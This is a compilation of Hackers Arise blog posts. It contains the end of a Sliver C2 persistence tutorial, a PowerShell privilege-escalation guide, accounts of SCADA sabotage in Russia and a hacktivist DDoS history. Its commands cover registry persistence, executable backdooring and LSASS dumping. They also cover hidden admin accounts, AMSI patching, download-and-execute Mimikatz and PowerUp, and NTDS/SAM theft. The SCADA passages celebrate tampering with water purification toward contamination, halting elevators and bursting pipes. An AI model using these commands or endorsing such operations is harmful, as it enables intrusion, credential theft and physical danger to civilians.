This sets up a PowerShell command to run on system startup. It pulls a script from your server over HTTP and runs it. That script could then download and run your actual payload. This way, the system never keeps the full implant on disk for long, and antivirus tools are less likely to pick it up. You can name the entry something that fits the environment, like “EdgeUpdater” for example. Adjust it to your needs, but be careful with quoting and backslashes.

Registry Persistence

Another option is the Windows Registry. It’s a favorite among attackers because it’s harder for some admins to track. Still, some setups monitor registry changes, so be careful. Over time, you’ll get a feel for which methods are safer depending on the target.

Low Privilege (HKCU)

If you don’t have elevated privileges, this is your fallback:

sliver (session) > registry write -T string -H HKCU “Software\\Microsoft\\Windows\\CurrentVersion\\Run\\” “C:\\Users\\Public\\persist.exe”

This entry will execute your payload every time the compromised user logs in. If you want it to run only once, use RunOnce instead of Run.

High Privilege (HKLM)

With higher privileges, you can target all users on the system:

sliver (session) > registry write -T string -H HKLM “Software\\Microsoft\\Windows\\CurrentVersion\\Run\\” “C:\\Windows\\System32\\persist.exe”

Same idea, just applied at a broader level. The result is a more reliable form of persistence that doesn’t depend on one user.

Backdooring a Program

Another technique is to backdoor an existing executable. This means injecting a payload into a program so that every time it’s opened, it connects back to your C2. Keep in mind the program will no longer function as intended, it’s just a launcher now.

Here’s how to do that in Sliver:

sliver > profiles new –format shellcode –http <C2_IP>:9008 backdoor

sliver > http -L <C2_IP> -l 9008

sliver (session) > backdoor –profile backdoor “C:\path\to\file.exe”

In this case, you’re creating a profile called backdoor, starting a listener, and then injecting that payload into something like putty.exe. It’s not the best persistence method, but still worth knowing. We will leave the rest for you to experiment with.

Dumping LSASS

In the last chapter, you dumped password hashes from the SAM. Now we’re going after LSASS, which stores NTLM hashes for users currently logged in. This method can give you credentials for admins or service accounts, which can be used for lateral movement or better persistence.

Get the LSASS PID

First, we need to find out the process ID assigned to lsass.exe

sliver (session) > ps -e lsass

Dump the Process

Having the process ID, we will dump the LSASS using procdump and save it on our C2. ProcDumpis a lightweight, command‑line utility designed for creating process memory dumps under specified conditions.

sliver (session) > procdump –pid 688 –save /tmp/lsass.dmp

Extract Credentials

Pypykatz is another open‑source Python implementation of Mimikatz. It lets you extract credentials and secrets from Windows systems either “live” by reading the local LSASS process, or offline by parsing memory dumps and registry hives.

c2 > pypykatz lsa minidump /tmp/lsass.dmp

This gives you a list of users, their sessions, and credentials. If you’re lucky, you’ll find a domain admin account that can be used elsewhere.

Creating a Local Admin

If you can’t crack the hashes or you just need a fallback, you can add a new local admin account. This is simple, but it’s more likely to be flagged if someone’s watching. In some cases, it’s better to add an existing user to the Administrators group instead of creating one from scratch.

sliver (session) > execute net user service P@ssw0rd! /add

sliver (session) > execute net localgroup Administrators service /add

This will create a new user “service” and add it to the Administrators group. With local admin rights, you can easily escalate to SYSTEM. If your machine is a part of the domain, you can edit DACL to perform attacks subtly. This is called DACL abuse and it’s hard to detect, unless proper defenses are in place. But those defenses are rare in practice.

AnyDesk

AnyDesk isn’t part of Sliver, but it’s still useful. It’s a legitimate remote desktop tool that can be quietly installed on systems that don’t get much attention. Set it up with a custom password and ensure it always grants access. Anydesk is a solid fallback option, but it requires valid cleartext credentials to be useful. It’s best to have a local administrator account to log in through it. As mentioned earlier, having an over-privileged machine account in the domain takes care of the rest. It opens the door for techniques like DCSync, abusing AdminSDHolder, and a range of other domain-level attacks. It will always give you a way in, even if other access methods get wiped.

If AnyDesk has already been installed, you can find out the ID to connect to the machine:

sliver (session) > execute -o powershell -Command “& ‘C:\Program Files (x86)\AnyDesk\AnyDesk.exe’ –get-id”

Then force a new password:

sliver (session) > execute -o powershell -Command “echo P@ssw0rd! | & ‘C:\Program Files (x86)\AnyDesk\AnyDesk.exe’ –set-password”

Conclusion

At this point, you’ve laid the groundwork for stable, long-term access. Persistence is not just a backup plan, it is a fundamental part of post-exploitation procedures. From here, you’re ready to map out the network and begin lateral movement.

In Part 5 we will learn how to perform Active Directory domain reconnaissance, which can uncover certificates, trust relationships, passwords, and all the other key artifacts.

The post Sliver, Command and Control (C2): Building a Persistent C2, Part 4 first appeared on Hackers Arise.

Welcome back hackers!

For quite an extensive period of time we have been covering different ways PowerShell can be used by hackers. We learned the basics of reconnaissance, persistence methods, survival techniques, evasion tricks, and mayhem methods. Today we are continuing our study of PowerShell and learning how we can automate it for real hacking tasks such as privilege escalation, AMSI bypass, and dumping credentials. As you can see, PowerShell may be used to exploit systems, although it was never created for this purpose. Our goal is to make it simple for you to automate exploitation during pentests. Things that are usually done manually can be automated with the help of the scripts we are going to cover. Let’s start by learning about AMSI.

AMSI Bypass

Repo:

https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

AMSI is the Antimalware Scan Interface. It is a Windows feature that sits between script engines like PowerShell or Office macros and whatever antivirus or EDR product is installed on the machine. When a script or a payload is executed, the runtime hands that content to AMSI so the security product can scan it before anything dangerous runs. It makes scripts and memory activity visible to security tools, which raises the bar for simple script-based attacks and malware. Hackers constantly try to find ways to keep malicious content from ever being presented to it, or to change the content so it won’t match detection rules. You will see many articles and tools that claim to bypass AMSI, but soon after they are released, Microsoft patches the vulnerabilities. Since it’s important to be familiar with this attack, let’s test our system and try to patch AMSI.

First we need to check if the Defender is running on a Russian target:

PS > Get-WmiObject -Class Win32_Service -Filter “Name=’WinDefend’”

And it is. If it was off, we would not need any AMSI bypass and could jump straight to our explorations.

Patching AMSI

Next, we start patching AMSI with the help of our script, which you can find at the following link:

https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/shantanukhande-amsi.ps1

As you know by now, there are a few ways to execute scripts in PowerShell. We will use a basic one for demonstration purposes:

PS > .\shantanukhande-amsi.ps1

If your output matches ours, then AMSI has been successfully patched. From now on, the Defender does not have access to your PowerShell sessions and any kind of scripts can be executed in it without restriction. It’s important to mention that some articles on AMSI bypass will tell you that downgrading to PowerShell Version 2 helps to evade detection, but that is not true. At least not anymore. Defender actively monitors all of your sessions and these simple tricks will not work.

Dumping Credentials with Mimikatz

Repo:

http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1

Since you are free to run anything you want, we can execute Mimikatz right in our session. Note that we are using Invoke-Mimikatz.ps1 by g4uss47, and it is the updated PowerShell version of Mimikatz that actually works. For OPSEC reasons we do not recommend running Mimikatz commands that touch other hosts because network security products might pick this up. Instead, let’s dump LSASS locally and inspect the results:

PS > iwr http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1 | iex  

PS > Invoke-Mimikatz -DumpCreds

Now we have the credentials of brandmanager. If we compromised a more valuable target in the domain, like a server or a database, we could expect domain admin credentials. You will see this quite often.

Privilege Escalation with PowerUp

Privilege escalation is a complex topic. Frequently systems will be misconfigured and people will feel comfortable without realizing that security risks exist. This may allow you to skip privilege escalation altogether and jump straight to lateral movement, since the compromised user already has high privileges. There are multiple vectors of privilege escalation, but among the most common ones are unquoted service paths and insecure file permissions. While insecure file permissions can be easily abused by replacing the legitimate file with a malicious one of the same name, unquoted service paths may require more work for a beginner. That’s why we will cover this attack today with the help of PowerUp. Before we proceed, it’s important to mention that this script has been known to security products for a long time, so be careful.

Finding Vulnerable Services

Unquoted Service Path is a configuration mistake in Windows services where the full path to the service executable contains spaces but is not wrapped in quotation marks. Because Windows treats spaces as separators when resolving file paths, an unquoted path like C:\Program Files\My Service\service.exe can be interpreted ambiguously. The system may search for an executable at earlier, shorter segments of that path (for example C:\Program.exe or C:\Program Files\My.exe) before reaching the intended service.exe. A hacker can place their own executable at one of those earlier locations, and the system will run that program instead of the real service binary. This works as a privilege escalation method because services typically run with higher privileges.

Let’s run PowerUp and find vulnerable services:

PS > iwr https://raw.githubcontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Privesc/PowerUp.ps1 | iex  

PS > Get-UnquotedService

Now let’s test the service names and see which one will get us local admin privileges:

PS > Invoke-ServiceAbuse -Name 'Service Name'

If successful, you should see the name of the service abused and the command it executed. By default, the script will create and add user john to the local admin group. You can edit it to fit your needs.

The results can be tested:

PS > net user john

Now we have an admin user on this machine, which can be used for various purposes.

Attacking NTDS and SAM

Repo:

https://github.com/soupbone89/Scripts/tree/main/NTDS-SAM%20Dumper

With enough privileges we can dump NTDS and SAM without having to deal with security products at all, just with the help of native Windows functions. Usually these attacks require multiple commands, as dumping only NTDS or only a SAM hive does not help. For this reason, we have added a new script to our repository. It will automatically identify the type of host you are running it on and dump the needed files. NTDS only exists on Domain Controllers and contains the credentials of all Active Directory users. This file cannot be found on regular machines. Regular machines will instead be exploited by dumping their SAM and SYSTEM hives. The script is not flagged by any AV product. Below you can see how it works.

Attacking SAM on Domain Machines

To avoid issues, bypass the execution policy:

PS > powershell -ep bypass

Then dump SAM and SYSTEM hives:

PS > .\ntds.ps1

Wait a few seconds and find your files in C:\Temp. If the directory does not exist, it will be created by the script.

Next we need to exfiltrate these files and extract the credentials:

bash$ > secretsdump.py -sam SAM -system SYSTEM LOCAL

Attacking NTDS on Domain Controllers

If you have already compromised a domain admin, or managed to escalate your privileges on the Domain Controller, you might want to get the credentials of all users in the company.

We often use Evil-WinRM to avoid unnecessary GUI interactions that are easy to spot. Evil-WinRM allows you to load all your scripts from the machine so they will be executed without touching the disk. It can also patch AMSI, but be really careful.

Connect to the DC:

c2 > evil-winrm -i DC -u admin -p password -s ‘/home/user/scripts/’

Now you can execute your scripts:

PS > ntds.ps1

Evil-WinRM has a download command that can help you extract the files. After that, run this command:

bash$ > secretsdump.py -ntds ntds.dit -sam SAM -system SYSTEM LOCAL

Summary

In this chapter, we explored how PowerShell can be used for privilege escalation and complete domain compromise. We began with bypassing AMSI to clear the way for running offensive scripts without interference, then moved on to credential dumping with Mimikatz. From there, we looked at privilege escalation techniques such as unquoted service paths with PowerUp, followed by dumping NTDS and SAM databases once higher privileges were achieved. Each step builds on the previous one, showing how hackers chain small misconfigurations into full organizational takeover. Defenders should also be familiar with these attacks as it will help them tune the security products. For instance, harmless actions such as creating a shadow copy to dump NTDS and SAM can be spotted if you monitor Event ID 8193 and Event ID 12298. Many activities can be monitored, even benign ones. It depends on where defenders are looking at.

The post PowerShell for Hackers, Part 8: Privilege Escalation and Organization Takeover first appeared on Hackers Arise.

Welcome back, cyberwarriors.

This is the final part in our series on SCADA hacking. We continue diving into operations conducted by the Cyber Cossacks, a unit formed by OTW at the request of the Ukrainian government. These missions were carried out together with various Ukrainian hacker groups across the country. In unity we are strong!

Water Utility – Voronezh, Russia

Voronezh Water Utility is a major regional provider serving more than 1,050,000 residents in the city and nearby areas. The utility sources raw water from the Voronezh River and treats it at two large plants equipped with sand filtration, UV disinfection, and chemical dosing units. The final product is distributed through a network of over 1,200 kilometers of pipes. A separate system handles wastewater collection and purification using a mix of mechanical and biological treatment stages. Federal guidelines set strict standards, and the utility operates under regulatory oversight from Rosprirodnadzor and Rospotrebnadzor.

The utility’s infrastructure includes multiple SCADA workstations, PLC units at pump stations, telemetry relays at water towers, and a central monitoring hall. Around 300 employees manage operations, including remote inspections and data logging.

In late 2024, one of their employees clicked on a malicious email disguised as an equipment upgrade notice. This gave us access to the corporate network. From there, we moved laterally, bypassing internal firewalls and accessing the SCADA servers. For several weeks, the purification process had been deliberately altered during the night, with the aim of contaminating the water supply with chemicals. It took them weeks to notice the suspicious system’s behavior on several machines. When the engineers logged in to investigate, they found control applications locked and SCADA databases wiped clean.

Recovery required specialist teams from Moscow. They came to rebuild the infrastructure.

Ice Arena – St. Petersburg, Russia

The Ice Arena Sports Complex in St. Petersburg is a major hub for ice sports and public recreation. The building is often used for regional tournaments, youth training camps, and figure-skating events. The rinks are kept operational by an industrial-grade refrigeration system controlled by a SCADA platform that adjusts compressors, chillers, and air handlers.

In 2024, we launched a targeted spear-phishing campaign against front-desk staff, posing as event organizers. One employee took the bait, allowing us to infiltrate the internal network. From there, we accessed the SCADA subnet. At night we remotely shut down the compressors and chilled-water pumps. Within hours, ice temperatures rose, creating soft patches and melting zones.

We also managed to manipulate air circulation systems, flooding locker rooms with freezing air and locking operators out of the control systems. The attack happened just before a regional competition, throwing event schedules into chaos. Finally, technicians decided to isolate the SCADA servers physically. But we had already embedded a scheduled wiper, programmed to delete everything a few days later.

For deeper compromise, you can implant a hidden service that runs silently with SYSTEM privileges. Over time, this infects off-site backups, ensuring every recovery attempt carries the malware forward.

Business Center – Moscow, Russia

Located on Vasilisy Kozhinoy Street in western Moscow, this big business center houses tech startups, consulting firms, and shared office tenants. The building has a digital elevator system, climate controls, RFID access gates, and a surveillance network. The control systems are maintained remotely by a contracted service provider.

Once in, we accessed the SCADA controls for the elevator system. All the elevators were halted using an emergency-stop command. Simultaneously, we revoked credentials for the operator consoles.

It must be tough to get stuck between floors. The team had no access to real-time diagnostics, leading to delays and significant disruptions across the building.

Water Utility – Petrozavodsk, Russia

Petrozavodsk, the capital of the Republic of Karelia, depends on its central water utility to draw and process water from Lake Onega. The system covers thousands of households, several public institutions, and light industrial sites.

During our operation, we gained access through an insecure VPN channel used by contractors for remote troubleshooting. Then closed several critical vault valves and increased pressure across specific districts, overwhelming older pipes to cause bursts and leaks throughout the city.

With no access to real-time telemetry, emergency services had to rely on manual inspections. Water distribution was unstable for days, especially in industrial zones.

Boiler House – Pervouralsk, Russia

In the industrial town of Pervouralsk, one gas-fired boiler house supports a nearby residential complex. The system includes four small-capacity boilers, each with its own control loop managed via SCADA terminals. Operators can toggle between automatic and manual modes, monitor temperatures, and adjust draft fan speeds.

After breaching the control room through remote desktop access we forced all systems into emergency shutdown. Then, by simulating erratic ignition cycles, we forced feed-water temperatures to exceed safe thresholds. The system’s draft fans failed, and district supply temperatures dropped sharply.

Residents could notice no heating within hours. With the SCADA terminals unresponsive and all settings scrambled, technicians could not reboot the system properly. A full reset required factory assistance and downtime of several days.

Water Utility – Samara, Russia

Samara is a key city along the Volga River, home to over a million residents and a wide industrial base. The city’s water utility handles sourcing, purification, and distribution across residential, commercial, and public service zones. A large SCADA system tracks flow rates, water levels, and chlorine dosing at treatment sites.

Within hours, we deployed ransomware that encrypted all control software, telemetry dashboards, and server logs. Operators had no access to chemical dosing data or pump controls.

The utility switched to manual modes, which involved teams physically inspecting and operating equipment. While crews were working on reactivation, residents had water quality issues. Backup systems proved inadequate, as ransomware had infected shared network storage.

Gas Stations – Russia

In August 2024, we launched one of our most effective SCADA attacks against fuel distribution systems across Russia. A separate article covers the campaign in full, but here we’ll revisit the SCADA environment itself. The compromised SCADA software was developed by a regional contractor and deployed in dozens of fueling stations. One remote management port (TCP 50000) was left exposed. It used basic authentication and featured a command-line interface for basic status control via commands like ps. The interface had a hidden command injection feature that poorly sanitized input.

We used this to run commands and establish reverse shells.  Having cracked the passwords, we found out that the default credentials are used across many stations. Ultimately, we compromised over 60 fueling stations, including some in annexed Crimea.

Some gas stations were completely bricked. Others remain under our control, proxying traffic for intelligence and routing during the ongoing cyberwarfare. Their infrastructure now works against them.

Conclusion

It’s been a wild ride, from freezing homes in St. Petersburg and cutting off water in small villages to shutting down elevators in Moscow and tampering with oil and gas controls. We hope you liked this series. If SCADA hacking is your thing, go check out OTW’s SCADA hacking course. Keep sharpening your skills, stay curious about how systems really work, and be safe out there. Until the next operation!

Welcome back, my cyberwarriors!

In this series, we will detail how an individual or small group of cyberwarriors can impact global geopolitics. The knowledge and tools that YOU hold are a superpower that can change history.

Use it wisely.

To begin this discussion, let’s look at the actions of a small group of hackers at the outset of the Russian invasion of Ukraine. We will detail these actions up to the present, attempting to demonstrate that even a single individual or small group can influence global outcomes in our connected digital world. Cyber war is real and even a single individual can have an impact on global political outcomes.

Let’s begin in February 2022, nearly 3 years ago. At that time, Ukraine was struggling to throw off the yoke of Russian domination. As a former member state of the Soviet Union (the successor to the Romanov’s Russian Empire), they declared their independence, like so many former Soviet republics (such as Estonia, Latvia, Lithuania, Georgia, Armenia, Kazakhstan, and others) from that failed and brutal alliance in 1991 (this is the moment that the Soviet Union disintegrated). This union failed primarily due to the inability of the Soviet Union to address the needs of their citizens. Simple things like food, clean water, and consumer goods. And, of course, the tyranny.

Russia, having lost absolute control of these nations, attempted to maintain influence and control by bending their leaders to Putin’s will. In Ukraine, this meant a string of leaders who answered to Putin, rather than the Ukrainian people. In addition, Russian state-sponsored hackers such as Sandworm, attacked Ukraine’s digital infrastructure repeatedly to create chaos and confusion within the populace. This included the famous BlackEnergy3 attack in 2014 against the Ukrainian power transmission system that blacked out large segments of Ukraine in the depths of winter (for more on this and other Russian cyberattacks against Ukraine, read this article).

In February 2022, the US and Western intelligence agencies warned of an imminent attack from Russia on Ukraine. In an unprecedented move, the US president and the intelligence community revealed, (based upon satellite and human intelligence-) that Russia was about to invade Ukraine. The new Ukrainian president, Volodymyr Zelenskyy, publicly denied and tried to minimize the probability that an attack was about to take place. Zelenskyy had been a popular comedian and actor in Ukraine (there is a Netflix comedy made by Zelenskyy before he became president named “Servant of the People”) and was elected president in a landslide election as the people of Ukraine attempted to clean Russian domination from their politics and become part of the free Europe. Zelenskyy may have denied the likelihood of a Russian attack to bolster the public mood in Ukraine and not anger the Russian leader (Ukraine and Russia have long family ties on both sides of the border) .

We at Hackers-Arise took these warnings to heart and started to prepare.

First, we enumerated the key websites and IP addresses of critical and essential Russian military and commercial interests. There was no time to do extensive vulnerability research on each of those sites with the attack imminent, so instead, we readied one of the largest DDoS attacks in history! The goal was to disable the Russians’ ability to use their websites and digital communications to further their war ends and cripple their economy. This is exactly the same tactic that Russia had used in previous cyber wars against their former republics, Georgia and Estonia. In fact, at the same time, Russian hackers had compromised the ViaSat satellite internet service and were about to send Ukraine and parts of Europe into Internet darkness (read about this attack here).

We put out the word to hackers around the world to prepare. Tens of thousands of hackers prepared to protect Ukraine’s sovereignty. Eventually, when Russian troops crossed the border into Ukraine on February 24, 2022, we were ready. At this point in time, Ukraine created the IT Army of Ukraine and requested assistance from hackers across the world, including Hackers-Arise.

Within minutes, we launched the largest DDoS attack the Russians had ever seen, over 760GB/sec (as documented later by the Russian telecom provider, Rostelcom). This was twice the size of any DDoS attack in Russian history (https://www.bleepingcomputer.com/news/security/russia-s-largest-isp-says-2022-broke-all-ddos-attack-records/) This attack was a coordinated DDoS attack against approximately 50 sites in Russia such as the Department of Defense, the Moscow Stock Exchange, Gazprom, and other key commercial and military interests.

As a result of this attack, Russian military and commercial interests were hamstrung. Websites were unreachable and communication was hampered. After the fact, Russian government leaders estimated that 17,000 IP addresses had participated and they vowed to exact revenge on all 17,000 of us (we estimated the actual number was closer to 100,000).

This massive DDoS attack, unlike any Russia had ever seen and totally unexpected by Russian leaders, hampered the coordination of military efforts and brought parts of the Russian economy to its knees. The Moscow Stock Exchange shut down and the largest bank, Sberbank, closed. This attack continued for about 6 weeks and effectively sent the message to the Russian leaders that the global hacker/cyberwarrior community opposed their aggression and was willing to do something about it. This was a
first in the history of the world!

The attack was simple in the context of DDoS attacks. Most DDoS attacks in our modern era involve layer 7 resources to make sites unavailable, but this one was simply an attack to clog the pipelines in Russia with “garbage” traffic. It worked. It worked largely because Russia was arrogant and unprepared without adequate DDoS protection from the likes of Cloudflare or Radware.

Within days, we began a new campaign to target the Russian oligarchs, the greatest beneficiaries of Putin’s kleptocracy (you can read more about it here). These oligarchs are complicit in robbing the Russian people of their resources and income for their benefit. They are the linchpin that keeps the murderer, Putin, in power. In this campaign, initiated by Hackers-Arise, we sought to harass the oligarchs in their yachts throughout the world (the oligarchs escape Russia whenever they can). We sought to first (1) identify their yachts, then (2) locate their yachts, and finally (3) send concerned citizens to block their fueling and re-supply. In very short order, this campaign evolved into a program to capture these same super yachts and hold them until the war was over, eventually to sell and raise funds to rebuild Ukraine. We successfully identified, located, and seized the top 9 oligarch yachts (worth billions of USD), including Putin’s personal yacht (this was the most difficult). All of them were seized by NATO forces and are still being held.

In the next few posts here we will detail;

1. The request from the Ukraine Army to hack IP cameras in Ukraine for surveillance and our success in doing so;

2. The attacks against Russian industrial systems resulted in damaging fires and other malfunctions.

   Look for Master OTW’s book, “A Cyberwarrior Handbook”, coming in 2026.